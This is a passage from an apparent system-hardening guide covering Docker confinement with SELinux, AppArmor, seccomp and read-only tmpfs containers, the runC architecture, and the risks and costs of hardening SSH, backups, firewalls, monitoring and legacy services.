providing your policy is loaded as mentioned above. There are further details available on the apparmor page of Docker's Secure Engine documentation.
SELinux LSM in Docker
Red Hat, Fedora, and some other distributions ship with SELinux policies for Docker. Many other distros such as Debian require an install. SELinux needs to be installed and configured on Debian.
SELinux support for the Docker daemon is disabled by default and needs to be enabled with the following command:
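Presumably by starting the daemon with the `--selinux-enabled` flag:

```
dockerd --selinux-enabled
```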
Docker daemon options can also be set within the daemon configuration file
/etc/docker/daemon.json
by default or by specifying an alternative location with the --config-file
flag.
Label confinement for the container can be configured using `--security-opt` to load SELinux or AppArmor policies, as shown in the Docker `run` example below:
SELinux labels for Docker consist of four parts: User, Role, Type and Level (sensitivity).
SELinux can be enabled in the container using setenforce 1
.
SELinux can operate in one of three modes:
- `disabled`: not enabled in the kernel
- `permissive` or `0`: SELinux is running and logging, but not controlling/enforcing permissions
- `enforcing` or `1`: SELinux is running and enforcing policy

To change at run-time: use the `setenforce [0|1]` command to change between `permissive` and `enforcing`. Test this, set to `enforcing`, before persisting it at boot.
To persist on boot: in Debian, set `enforcing=1` on the kernel command line (`GRUB_CMDLINE_LINUX` in `/etc/default/grub`) and run `update-grub`. SELinux will be enforcing after a reboot.
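A hedged sketch of the relevant part of `/etc/default/grub`; note that Debian typically also needs SELinux itself enabled on the kernel command line (`selinux-activate` normally adds those arguments for you):

```
GRUB_CMDLINE_LINUX="selinux=1 security=selinux enforcing=1"
# then regenerate the grub configuration:
update-grub
```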
To audit what LSM options you currently have applied to your containers, run the following command from the CIS Docker Benchmark:
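A sketch of that kind of audit, which may not match the CIS wording exactly:

```
docker ps --quiet --all | xargs docker inspect --format '{{ .Id }}: SecurityOpt={{ .HostConfig.SecurityOpt }}'
```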
First you need to make sure your Docker instance was built with Seccomp, using the recommended command from the CIS Docker Benchmark, and that your kernel is configured with `CONFIG_SECCOMP`:
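A sketch of both checks; the kernel config path is an assumption that varies by distribution:

```
# Seccomp should be listed in the Docker daemon's security options:
docker info --format '{{ .SecurityOptions }}'
# And the kernel should have been built with seccomp support:
grep SECCOMP /boot/config-$(uname -r)
```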
To add System calls to the list of syscalls you want to block for your container, take a copy of the default seccomp profile for containers (`default.json`), which contains a whitelist of the allowed System calls, remove the System calls you want blocked, then run your container with the `--security-opt` option to override the default profile with the copy that you have modified:
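For example (the profile path and image are assumptions):

```
docker run -it --security-opt seccomp=/path/to/modified-default.json debian /bin/bash
```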
Running a container with the --read-only
flag stops writes to the container.
This can sometimes be a little too constraining, as your application may need to write some temporary data locally. You could volume mount a host directory into your container, but this would obviously expose that temporary data to the host, and also to other containers that may mount the same host directory. To stop other containers sharing your mounted volume, you would have to employ labelling with the likes of LSM and apply the `Z` suffix at volume mount time.
A better, easier and simpler solution would be to apply the `--tmpfs` flag to one or more directories. `--tmpfs` allows the setting up of tmpfs mounts (appearing as a mounted file system, but stored in volatile memory) on any local directory, solving the problem of not being able to write at all to read-only containers.
If an existing directory is specified with the `--tmpfs` option, you will experience similar behaviour to that of mounting an empty directory onto an existing one: the directory is initially empty, and any additions or modifications to the directory's contents will not persist past container stop.
The following is an example of running a container as read-only with a writeable tmpfs /tmp
directory:
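A minimal sketch; the image is an assumption:

```
docker run -it --read-only --tmpfs /tmp debian /bin/bash
```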
The default mount flags with `--tmpfs` are the same as the Linux default `mount` flags; if you do not specify any mount flags, the following will be used:
rw,noexec,nosuid,nodev,size=65536k
Docker Engine is now built on containerd and runC. Engine creates the image and passes it to containerd, which in turn runs it via runC (which uses libcontainer).
containerd (daemon for Linux or Windows):
is based on the Docker engine’s core container runtime. It manages the complete container life-cycle, managing primitives on Linux and Windows hosts such as the following, whether directly or indirectly:
`containerd` calls `containerd-shim`, which uses runC to run the container. `containerd-shim` allows the runtime, which is `docker-runc` in Docker's case, to exit once it has started the container, thus allowing the container to run without a daemon. You can see this if you run:
ps aux | grep docker
In fact, if you run this command you will see how all the components hang together. Viewing this output along with the diagram below will help solidify your understanding of the relationships between the components.
runC: is the container runtime that runs containers (think: run Container) according to the OCI specification. runC is a small standalone command line tool (CLI) built on, and providing an interface to, libcontainer, which does most of the work. runC provides an interface to:
These features have been integrated into the low level, light weight, portable container runtime CLI called runC, with libcontainer doing most of the work. It has no dependency on the rest of the Docker platform, and has all the code required by Docker to interact with the container-specific system features. More correctly, libcontainer is the library that interfaces with the above mentioned kernel features; runC leverages libcontainer directly, without the Docker engine being required in the middle.
runC was created by the OCI, whose goal is to have an industry standard for container runtimes and formats, attempting to ensure that containers built for one engine can run on other engines.
runC can be installed separately, but it does come with Docker (in the form of `docker-runc`) as well. Just run it to see the available commands and options.
runC allows us to configure and debug many of the above mentioned points we have discussed. If you want, or need to get to a lower level with your containers, using runC
(or if you have Docker installed, docker-runc
), directly can be a useful technique to interact with your containers. It does require additional work that docker run
commands already do for us. First you will need to create an OCI bundle, which includes providing configuration in the host independent config.json
and host specific runtime.json
files. You must also construct or export a root filesystem, which if you have Docker installed you can export an existing containers root filesystem with docker export
.
A container manifest (config.json
) can be created by running:
runc spec
which creates a manifest according to the Open Container Initiative (OCI)/runc specification. Engineers can then add any additional attributes such as capabilities on top of the three specified within a container manifest created by the runc spec
command.
Yes container security is important, but in most cases, it is not the lowest hanging fruit for an attacker.
Application security is still the weakest point for compromise. It is usually much easier to attack an application running in a container or anywhere for that matter than it is to break container isolation or any security offered by containers or their infrastructure. Once an attacker has exploited any one of the commonly exploited vulnerabilities (such as any of the OWASP Top 10 for starters) still being introduced and found in our applications on a daily basis, and subsequently performed a remote code execution for example, and ex-filled the database, no amount of container security is going to mitigate this.
During and before my interview of Diogo Mónica on Docker Security for the Software Engineering Radio show, we discussed Isolation concepts, many of which I have covered above. Diogo mentioned: “why does isolation even matter when an attacker already has access to your internal network?” There are very few attacks that require escaping from a container or VM in order to succeed, there are just so many easier approaches to compromise. Yes, this may be an issue for the cloud providers that are hosting containers and VMs, but for most businesses, the most common attack vectors are still attacks focussing on our weakest areas, such as people, password stealing, spear phishing, uploading and execution of web shells, compromising social media accounts, weaponised documents, and ultimately application security, as I have mentioned many times before.
Diogo and I also discussed the number of container vs VM vulnerabilities, and it is pretty clear that there are far more vulnerabilities affecting VMs than there are affecting containers.
VMs have memory isolation, but many of the bugs listed in the Xen CVEs alone circumvent memory isolation benefits that VMs may have provided.
Another point that Diogo raised was the ability to monitor/inspect and control the behaviour of applications within containers. In VMs there is so much activity that is unrelated to your applications that, although you can monitor activity within VMs, the noise-to-signal ratio is just too high to get accurate indications of what is happening in and around your application that actually matters to you. VMs also provide very little ability to control the resources associated with your running application(s). Inside of a container, you have your application and hopefully little else. With the likes of Control Groups you have many points at which you can monitor and control aspects of the application environment.
As mentioned above, Docker containers are immutable, and can be run read-only.
The Secure Developer podcast, with Guy Podjarny interviewing Ben Bernstein (CEO and founder of Twistlock) in show #7, Understanding Container Security, also echoes these same sentiments.
Also be sure to check the Additional Resources chapter for many excellent resources I collected along the way on Docker security.
Just do not do this. Either stay disciplined and upgrade your servers manually or automate it. Start out the way you intend to go. Work out your strategy for keeping your system(s) up to date and patched. There are many options here. If you go auto, make sure you test on a staging environment before upgrading live.
Make sure all your data and VM images are backed up routinely. Make sure you test that restoring your backups works. Backup or source control system files, deployment scripts and whatever else is important to you. Make sure you have backups of your backups and source control. There are plenty of tools available to help. Also make sure you are backing up the entire VM, if your machine is a virtual guest, by exporting/importing OVF files. I also like to backup all the VM files. Disk space is cheap. Is there such a thing as being too prepared for a disaster? I don't think I have seen it yet. It is just a matter of time before you will be calling on your backups.
This is one of the last things you should look at. In fact, it is not really needed if you have taken the time to remove unnecessary services and harden what is left. If you use a host firewall keep your set of rules to a minimum to reduce confusion and increase legibility. Maintain both ingress & egress.
The following is a final type of check-list that I like to use before opening a hardened web server to the world. You will probably have additional items you can add.
`CNAME` or whatever type of DNS record you are using
Are there any? If so, what are they?
Bringing your VPS(s) in-house can provide certainty and reduce the risks of vendor lock-in, but the side-effect of this is that you may not get your solution to market quickly enough, and someone else beats you to it, which may mean the end of business for you. Many of the larger cloud providers are getting better at security and provide many tools and techniques for hardening the resources you hire.
Often SMB services are required, so turning them off may not be an option.
Some of the countermeasures may introduce some inconvenience.
There is the somewhat obvious aspect that applying the countermeasures will take some research to work out what can be done and the length of time it will take to do it.
Next generation Anti-Virus (AV) using machine learning is currently expensive.
Deep Script Block Logging can consume large amounts of disk space if you have “enabling Log script block invocation start / stop events” turned on.
You may not have something installed that you need.
You may find some stage later on that a component that you removed is actually needed.
This process can sometimes lock things down too tightly. I would much rather go too far here and have to back things off a little, or get creative with a script to unmount, remount with fewer restrictions applied, perform the action you need, then mount again according to the `/etc/fstab`. This is similar to the Mounting of Partitions section below.
The default number of rounds applied to the key stretching process by the Unix C library (Crypt) has not changed in the last 9 years. I addressed this in the Countermeasures section, but most people will not bother increasing this value. I would recommend doing so.
Just because you may be using SSH and SSH itself is secure, does not mean you are using it in a secure way. If you follow my advice in the Countermeasures section you will be fine. SSH can be used in insecure ways.
When you make configuration changes to SSH, it often pays to either have physical access or have more than one SSH session open when you make the change -> restart SSH -> exit your session, otherwise you run the risk of locking yourself out.
If you have to boot from an alternative medium such as a rescue CD, you may wonder why this does not work.
You may lock yourself out of being able to administer your system. This is similar to the Partitioning on OS Installation section above.
If you are using portmap, consider swapping it for rpcbind.
You may be using Exim. Make sure you are not before you disable it.
You may be using NIS+. Make sure you are not before you disable it.
As discussed in the Countermeasures section, just make sure you have no need for Rpcbind before you remove it. Taking the slightly safer approach of just denying rpcbind responses in the /etc/hosts.deny
is also an option.
Someone legitimate may be relying on telnet. If this is the case, you may have larger problems than telnet. The Ignorance section of Identify Risks of the People chapter in Fascicle 0 may be pertinent here.
You may have some staff that are set in their ways. Gently coax them to understand the complete absence of security with FTP and the issues with FTPS.
Possible misconfiguration, make sure you test your configuration thoroughly after changes.
Possibly false confidence in the tools that are supposed to provide visibility. Using a collection of similar tools can be a good idea; the attacker then only needs to miss one of them to be noticed.
Of course any of the visibility providing tools can be replaced with trojanised replicas, unless you have a Host Intrusion Detection System (HIDS) running from a location that the attacker is not aware of, continually checking for the existence and validity of the core system components.
There are lots of options to choose from in this space.
Logging and Alerting is never going to be a complete solution. There is a risk that people think one or two tools mean they are covered from every type of attack; this is never the case. A large array of diverse countermeasures is always going to be required to produce good visibility of your system(s), even using multiple tools that do similar jobs but take different strategies on how they execute and, in fact, from where they run.
There are some complexities that you need to understand in order to create a water-tight and reliable off-site logging system. I discuss these in the Countermeasures section along with testing and verifying your logs are being transferred privately.
Overconfidence in monitoring tools. For example, an attacker could try to replace the configuration files for Monit, or the Monit daemon itself, so the following sorts of tests would either not run or would return tampered-with results:
In saying that, if you have an agentless file integrity checker (running from somewhere else), or even several of them running on different machines, and checking Monit is part of their scope, then the attacker is going to have to find the agentless file integrity checker(s) and disable them as well, without being noticed. Especially as I discussed in regards to Stealth, the recommendation was that the Monitor not accept any incoming connections, and be in a physically safe location. This increases the level of difficulty for an attacker significantly.
You could, and should, also have a NIDS running on your network, which makes it even more likely that an attacker is going to step on a land mine.
There are new components introduced, which increases attack surface.
The benefits far outweigh any risks here.
Using a system like Stealth as your file integrity checker, which resides on a server (or servers) somewhere else and runs against the target server, means an attacker will very often not realise that they are under observation, as they can not see the observer running on the machine that they are on.
This sort of strategy provides a false sense of security for the attacker; in a way, a similar concept to the honey pot. They may know about a tool operating on the server they are on, and even have disabled it, but if you keep the defence in depth mentality, there is no reason that you can not have the upper hand without the attacker being aware of it.
You can also take things further with honey pits and mirages; these are modules in code that actively produce answers designed to confuse and confound poking and prodding attackers. This can create the perfect ambush and burn up the attacker's time. Attackers have budgets too. The longer it takes an attacker to compromise your system(s), the more likely they are to start making mistakes and get caught.
Docker security is a balancing act. There are many things you can do, that will not disadvantage you in any way. Experiment.
There are hundreds of LSM security hooks throughout the kernel, these hooks provide additional attack surface. An attacker with a buffer overflow vulnerability for example may be able to insert their own byte code and bypass the LSM provided implementation, or even redirect to a payload of their choosing. James Morris, a Linux Kernel Developer discussed this on his blog.
Employing a LSM and learning its intricacies and how to configure it is a bit of a learning curve, but one that is often well worth the effort, and this does not just apply to Docker, but all of the hundreds of resources that the kernel attempts to manage.
Relying on scheduled backups that do not exist or have in some way failed. Make sure you test your backups routinely. What you use to backup will obviously depend on where you are operating and what you are trying to backup. For example, if you are backing up Docker containers, just get those Dockerfiles in source control. If you are backing up VPSs locally, use your preferred infrastructure management tool, such as Terraform. If you are in the cloud, your provider will almost certainly have a tool for this.
Personally, I prefer not to rely on firewalls; once you have removed any surplus services and hardened what is left, firewalls do not provide a lot of benefit. I recommend not relying on them, but instead making your system(s) hard enough that you do not require a firewall. Then, if you decide to add one, it will be just another layer of defence. Dependence on firewalls often produces a single point of failure and a false sense of security, as too much trust is placed in them to protect weak and vulnerable services and communications that should instead be hardened themselves.
If you choose to go the route that is now the default and rely on others for your compute, these are some things you should consider:
Work through the collection of countermeasure items. Just as we did in the Countermeasures section of the 30,000’ View chapter of Fascicle 0, you should have already applied a relative number for the amount of work to be done to each Countermeasure Product Backlog Item. The costs and trade-offs will often become obvious as you iterate on the countermeasure work itself.
Personally, I think next generation AV with machine learning is worth the cost.
You could consider not enabling “Log script block invocation start / stop events”, but I would sooner have it on, and consider getting your logs off-site, as we discussed in the Logging and Alerting section, with a well configured logrotate schedule.
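If those logs do end up on a GNU/Linux log host, a logrotate stanza along the following lines keeps them from growing without bound; the drop-in name, log path and retention are hypothetical:

```bash
# Hypothetical logrotate drop-in; adjust the glob and retention to suit.
sudo tee /etc/logrotate.d/scriptblock <<'EOF'
/var/log/scriptblock/*.log {
    daily
    rotate 14
    compress
    delaycompress
    missingok
    notifempty
}
EOF
```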
When you find out you need something, research it along with alternatives. Work out whether the additional attack surface is worth the functionality you wish to add.
Do your homework up front and decide what actually needs to stay and what does not. In most cases re-enabling or re-adding will only cost you time.
Often a little trial and error is required to get the optimal configuration for your needs.
Making these changes takes a little time, depending on how familiar you are with Crypt and how it does things.
If you use Docker and do not run as root, then you have another layer that any attacker has to break through in order to get to the host system. This raises the bar significantly on host password compromise.
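As a rough sketch of what that looks like in practice, you can run the container's main process as an unprivileged user rather than root; the UID/GID and image name below are placeholders, and the same effect can be baked into the image with a USER instruction in the Dockerfile:

```bash
# Run the container's main process as an unprivileged user, not root.
docker run --user 1000:1000 your-image
```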
SSH itself is secure, but you can still use it insecurely. I have seen some organisations store their private keys on their developer wiki so that all the developers within the company can easily access the private key and copy it locally. Do not do this; there are so many things wrong with it.
Make sure you use a pass phrase, unless you have a good reason not to and can safeguard your SSH access in some other way, for example by using ssh-cron.
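A minimal sketch of generating a key pair with a pass phrase and loading it into an agent, so you are not typing the pass phrase on every connection; the comment and key path are just examples:

```bash
# ssh-keygen prompts for a pass phrase interactively; do not leave it empty.
ssh-keygen -t ed25519 -C "you@example.com" -f ~/.ssh/id_ed25519

# Load the key into ssh-agent once per session.
eval "$(ssh-agent -s)"
ssh-add ~/.ssh/id_ed25519
```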
I am sure you will be smart enough to work it out. Just re-enable the boot option for whatever device it is you are trying to boot from, and do not forget to disable it once you are finished.
Locking yourself out of being able to administer your system due to overly zealous restrictive mount options is not the end of the world; just boot from a live CD and you will be able to adjust your `/etc/fstab`.
This is also a place where Docker containers shine, by using the `--read-only` flag and many other options that can help immensely; be sure to check the Docker sections if you have not already.
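As a hedged example (image and volume names are placeholders), a container can be run with a read-only root filesystem, with any genuinely writable locations declared explicitly:

```bash
# Read-only root filesystem; writable paths have to be declared deliberately.
docker run --read-only \
  --tmpfs /tmp \
  -v app-data:/var/lib/app \
  your-image
```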
Portmap is simple to disable, go ahead.
If you are not using Exim, it only takes a few minutes to disable, so go ahead.
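On the Debian instances this chapter focuses on, that might look like the following; unit and package names can differ between releases and init systems, so treat this as a sketch:

```bash
# Stop and disable the Exim daemon (systemd based install assumed).
sudo systemctl stop exim4
sudo systemctl disable exim4

# Or remove it entirely if nothing on the host needs a local MTA.
sudo apt-get purge exim4 exim4-base exim4-config
```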
I am not aware of any costs with removing NIS if it is not necessary, and if it is being used, consider using something else.
I am not aware of any costs with removing or disabling responses from rpcbind if it is not required.
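A sketch of disabling it on a systemd based Debian install, then confirming nothing is left listening on the portmapper port:

```bash
# Stop, disable and mask rpcbind so nothing pulls it back in as a dependency.
sudo systemctl stop rpcbind.service rpcbind.socket
sudo systemctl disable rpcbind.service rpcbind.socket
sudo systemctl mask rpcbind.service

# Port 111 should no longer be listening.
sudo ss -tlnp | grep ':111 ' || echo "rpcbind no longer listening"
```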
If someone legitimate is still relying on telnet, send them to the Risks section followed by the Countermeasures section.
If you can convince your staff to read and understand the issues with FTP and FTPS, including the possible confusion around how to use FTPS securely and what can go wrong, and mandate a more secure file transfer protocol such as the recommended SFTP or SCP, then you just need to make sure SSH is not being used incorrectly.
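Both SFTP and SCP ride over the SSH daemon you have already hardened, so there is no extra service to expose. A hypothetical transfer, with placeholder user, host and paths:

```bash
# Copy a file over SSH.
scp ./release.tar.gz deploy@host.example.com:/srv/releases/

# Or use the interactive SFTP client.
sftp deploy@host.example.com
# sftp> put release.tar.gz /srv/releases/
# sftp> quit
```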
If you are using NFS, there is some configuration required, which can take a few minutes. Scripting this with a configuration management tool is a good idea if you need to apply the same configuration to many servers.
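As a rough sketch of the kind of configuration involved (the share path and subnet are placeholders): export read-only to a single subnet with root squashed, then re-export and verify what is actually offered:

```bash
# Hypothetical export: read-only, restricted to one subnet, root squashed.
echo '/srv/share 192.168.10.0/24(ro,sync,root_squash,no_subtree_check)' | sudo tee -a /etc/exports

sudo exportfs -ra   # apply the change
sudo exportfs -v    # review what is actually being exported
```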
All of the suggested offerings under this heading take time to set up. Evaluate where your weakest areas are and which offerings will give you the best results for your situation, and start there.
You will need to invest time into understanding what each offering does, along with its strengths and weaknesses.
This will take some time to set up, test, and verify all the requirements. Reliable off-site logging is essential on most systems.
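If rsyslog happens to be your shipper, the forwarding side can be as small as the following; the collector hostname is a placeholder, `@@` forwards over TCP and a single `@` would use UDP:

```bash
# Forward everything to the off-site collector.
sudo tee /etc/rsyslog.d/60-offsite.conf <<'EOF'
*.* @@logs.example.com:514
EOF

sudo systemctl restart rsyslog
```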
There was quite a bit of time spent in the Countermeasures section, but most of that work is now done for you. Now it is just a matter of following the steps I have laid out.
I have found these tools to be well worth the investment when you are dealing with hosts. We also cover statsd in the Web Applications chapter, which performs a similar role for the application itself. If you are using Docker containers, the lowest hanging fruit in terms of security, from an external attacker's perspective, definitely falls on your application code.
A HIDS is one of the must-haves on your systems. It also needs to be set up as early as possible, ideally before the server has been exposed to the internet, or to any network where an attacker has the potential to gain access and plant malware.
Some of the extra steps you may take beyond Docker's default security may restrict some flexibility; when and if this happens, just back them off a bit. There are many aspects of hardening Docker that have no negative side effects at all. Concentrate on these after you have your application security at a good level; usually that in itself is a lot of work.
There are many ways to do this. If you are a one-man band, really simple techniques may work well; if you are a large shop, you will ideally want an automated solution, whether you build it yourself or rely on someone else to do it.
Work out what you need, count the costs of that data being lost, measure the cost of the potential solutions, and compare.
I have used rsync in many shapes and forms for many years, and it has served me well. Check your backup logs to make sure that what you think is happening actually is. When you are setting up your backup scripts, dry-run test them to make sure you do not overwrite something, or some place, that was not intended.
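For example, a dry run (`-n`) reports what rsync would transfer or delete without touching anything; the user, host and paths below are placeholders:

```bash
# Dry run first: nothing is written, you just see what would happen.
rsync -avzn --delete /var/www/ backupuser@backuphost:/srv/backups/www/

# Once the output looks right, drop the -n and keep a log of the real run.
rsync -avz --delete /var/www/ backupuser@backuphost:/srv/backups/www/ \
  >> /var/log/backup-www.log 2>&1
```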
You can run scripts manually if you are disciplined and they are very easy; otherwise it usually pays to automate them. Cron does what it says on the box.
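Assuming the backup has been wrapped in a script like the one sketched above, a nightly cron entry could be installed along these lines; the schedule and script path are placeholders:

```bash
# Append a 02:30 nightly run to the current user's crontab.
( crontab -l 2>/dev/null; echo '30 2 * * * /usr/local/bin/backup-www.sh' ) | crontab -
```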
A host firewall can be a good temporary patch, and that is the problem. Nothing is as permanent as a temporary patch. A firewall is a single layer of defence and one that is often used to hide the inadequacies of the rest of the layers of defence.